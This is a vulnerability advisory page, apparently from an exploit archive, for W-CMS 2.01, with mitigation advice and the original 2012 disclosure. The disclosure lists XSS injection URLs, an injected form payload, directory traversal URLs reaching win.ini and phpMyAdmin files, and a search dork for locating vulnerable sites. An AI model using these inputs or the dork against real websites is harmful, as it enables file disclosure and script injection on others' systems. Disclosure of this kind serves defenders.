W-Cms Multiple Vulnerability

vendor:

W-CMS

by:

th3.g4m3_0v3r

5.5

CVSS

MEDIUM

Cross-Site Scripting (XSS), Directory Traversal

79, 22

CWE

Product Name: W-CMS

Affected Version From: 02.01

Affected Version To: 02.01

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7

2012

W-Cms Multiple Vulnerability

W-CMS is vulnerable to cross-site scripting (XSS) attacks and directory traversal attacks. The XSS vulnerability can be exploited through the 'index.php' and '?p=' parameters, allowing an attacker to inject malicious scripts. The directory traversal vulnerability allows an attacker to access sensitive files on the server by manipulating the 'p' parameter.

Mitigation:

To mitigate the XSS vulnerability, input validation and output encoding should be implemented to prevent the execution of malicious scripts. To mitigate the directory traversal vulnerability, proper input validation and file path restrictions should be enforced.

Source

Exploit-DB raw data:

# Exploit Title: W-Cms Multiple Vulnerability
# Date: 2012-01-09
# Author: th3.g4m3_0v3r
# Site:http://w-cms.info/
# Software Link: http://code.google.com/p/wcms/
# Dork: intext:"Powered by w-CMS"
# Version : [2.01]
# Tested on: Window 7
# Yogesh Kashyap, shubneet goel, w4rl0ck.d0wn, Chip, VzAcnY, Razzy, Sayan, Jaggi Panu, Darkgt
# www.h4ck3r.in, www.root-team.com, www.hackingmind.com, www.hackingcrackingtricks.in

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
www.h4ck3r.in            www.root-team.com             www.hackingmind.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

W-CMS cross site scripting
_______________

Vulnerable Link __________\/_____________________
_______________

http://localhost/index.php?bid=1&COMMENT=1 "XSS"
http://localhost/?p=3"XSS"
http://localhost/?bid=5&p=1"XSS"


http://localhost/?p=3<FORM action="Default.asp?PageId=-1" 
method=POST id=searchFORMname=searchFORM
  style="margin:0;padding:0"><INPUT type="hidden" value="" 
name="txtSEARCH"></FORM>

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
directory traversal attacks

This script is possibly vulnerable to directory traversal attacks

http://localhost/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
http://localhost/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Greetz To : 1337day.com ~ exploit-db.com ~ hackforums.net